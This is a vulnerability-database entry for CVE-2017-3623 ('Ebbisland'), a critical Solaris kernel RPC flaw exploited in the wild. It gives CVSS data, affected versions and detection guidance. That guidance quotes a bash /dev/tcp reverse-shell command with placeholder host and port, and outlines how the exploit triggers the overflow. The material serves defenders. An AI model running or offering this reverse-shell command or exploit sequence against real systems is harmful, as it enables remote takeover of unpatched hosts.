cbcvebase.
CVE-2017-3623
published 2017-04-24

CVE-2017-3623: Vulnerability in the Solaris component of Oracle Sun Systems Products Suite (subcomponent: Kernel RPC). For supported versions that are affected see note…

PriorityP185critical10CVSS 3.0
AVNACLPRNUINSCCHIHAH
ITWEXPLOITVulnCheck KEV
Exploited in the wild
EPSS
21.80%
97.3th percentile
Vulnerability in the Solaris component of Oracle Sun Systems Products Suite (subcomponent: Kernel RPC). For supported versions that are affected see note. Easily "exploitable" vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Solaris. While the vulnerability is in Solaris, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in takeover of Solaris. Note: CVE-2017-3623 is assigned for "Ebbisland". Solaris 10 systems which have had any Kernel patch installed after, or updated via patching tools since 2012-01-26 are not impacted. Also, any Solaris 10 system installed with Solaris 10 1/13 (Solaris 10 Update 11) are not vulnerable. Solaris 11 is not impacted by this issue. CVSS 3.0 Base Score 10.0 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H).

Affected

1 ranges
VendorProductVersion rangeFixed in
oracle_corporationsolaris_operating_system

Detection & IOCsextracted from sources · hover to see the quote

otherAUTH_LOOPBACK (0x55de)
otherRPC program number 100024 (status) over TCP
  • Detect RPC CALL packets using AUTH_LOOPBACK credential flavor (0x55de) arriving from external/non-loopback sources — this is the exploit's credential type used to trigger the kernel RPC buffer overflow.
  • Alert on RPC NULL procedure calls (proc=0) to RPC program 100024 (status service) over TCP that are immediately followed by a second connection with an oversized AUTH_LOOPBACK credential — the exploit first 'pings' then attacks.
  • Look for reverse shell activity spawning bash with '-c' argument containing a /dev/tcp redirect, as the shellcode executes: bash -i >& /dev/tcp/<lhost>/<lport> 0>&1
  • Solaris 10 systems that have NOT had any Kernel patch installed after 2012-01-26 and are NOT running Solaris 10 1/13 (Update 11) are vulnerable; Solaris 11 is not affected. Scope asset inventory accordingly.
  • If an RPC service crashes repeatedly after receiving oversized AUTH_LOOPBACK credential packets, it may be automatically disabled by inetd — monitor for unexpected RPC service restarts or disablement as a post-exploitation indicator.
  • ·The exploit targets IBM AIX PPC in addition to Solaris; the CVE was originally assigned for Solaris but the exploit code demonstrates applicability to AIX versions 6100-09-04-1441, 7100-03-05-1524, 7100-04-00-0000, and 7200-01-01-1642.
  • ·The exploit requires the attacker to supply correct gid_base, execl_func, and execl_toc values specific to the target system, meaning exploitation is target-architecture-dependent and not fully generic without reconnaissance.
  • ·The exploit shellcode requires /usr/bin/bash to be present on the target system.

CVSS provenance

nvdv3.010.0CRITICALCVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
nvdv2.010.0CRITICALAV:N/AC:L/Au:N/C:C/I:C/A:C
vulncheck10.0CRITICAL
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.